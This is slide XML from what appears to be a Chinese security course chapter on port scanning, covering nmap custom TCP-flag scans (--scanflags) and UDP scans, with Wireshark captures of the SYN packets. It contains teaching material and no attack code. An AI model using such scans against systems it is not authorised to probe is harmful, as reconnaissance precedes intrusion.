              <a:ext cx="457200" cy="457200"/>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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522267"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行自定义TCP协议的主机端口扫描并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤八</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>08</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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4" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 端口扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="文本框 114"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5998210" y="1012190"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2.查看 Wireshark工具抓取的数据包，可以发现nmap发送了大量的SYN包，如图2-2-58所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5998210" y="1657350"/>
            <a:ext cx="5276850" cy="3543300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="文本框 115"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5998210" y="5200650"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-58 nmap发送的数据包</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="3976052"/>
            <a:ext cx="5080000" cy="2030095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>nmap TCP自定义扫描是一种nmap的高级用法，这种扫描可以指定任意的TCP标志位来对服务器进行扫描。TCP自定义扫描-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>scanflags这个参数的后面需要加的是TCP标志位的字符名，如 SYN、FIN、ACK、PSH、RST、URG，可以单个使用，也可以将它们组合起来使用，就像上面的SYN和URG结合扫描。这样的自定义扫描可以让我们有新的发现。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行UDP协议的主机端口扫描并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤九</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>09</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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4" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 端口扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
